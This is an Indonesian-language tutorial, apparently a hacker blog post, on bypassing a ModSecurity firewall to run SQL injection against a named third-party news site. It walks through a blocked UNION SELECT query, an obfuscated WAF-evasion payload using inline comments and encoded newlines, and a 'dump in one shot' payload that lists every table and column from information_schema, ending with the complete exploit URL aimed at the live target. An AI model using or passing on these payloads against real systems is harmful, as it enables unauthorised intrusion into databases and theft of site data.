Bypass SQL Injection Mod Security

Oke di sini gua akan mematerikan SQL Injection mod security,Pada Umumnya SQL Injection Mod Security Hampir sama Dgn SQL Injection Forbiden 403,Orang Menyebutnya Ini adalah SQL Bypass.Si Admin Juga Pinter Memblokir Query Yg ada Di SQL,maka dari itu kita mem bypassnya,oke bagaimana cara bypassnya,simak di bawah sini:

Oke di sini gua ada target yaitu

https://www.abbaruna.com/news.php?id=28

Bahan² yang kita Butuh kan adalah :

1. Anonhackbar Link Click

2. Browser(Crome,FireFox,dll)

3. Otak Di pake

4. Jomblo

5. Kopi

Oke kita langsung langkah² nya :

Disini Si Admin Memblokir 

Query

https://www.abbaruna.com/news.php?id=28' union select 1,2,3,4,5,6,7,8-- -

Oke bagaimana Kita Cara Bypassnya Kita Bisa Pergi ke Anonhacbar

Di Anonhacbar kalian bisa paste targetnya

Setelah itu Kalian Klik WAF Bypass,Dan Bisa kalian Test Klo saya bianya pake ini

And .0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow 1,2,3,4,5,6,7,8-- -

Afetrnya gini

https://www.abbaruna.com/news.php?id=28' And .0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow 1,2,3,4,5,6,7,8-- -

Habis itu kalian Execute maka akan boom seperti ini

Nah Angka Togelnya di 3 & 5

Nash dibagian Sini Si admin Juga memblokir sebagian diosnya Nah Diosnya saya kasih di bawah

/*!50000make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)*/

Dan Maka hasilnya seperti ini

https://www.abbaruna.com/news.php?id=28%27%20And%20.0union/**/distinctrow%23GearFourth%0aselect/**/distinctrow%201,2,/*!50000make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)*/,4,5,6,7,8--%20-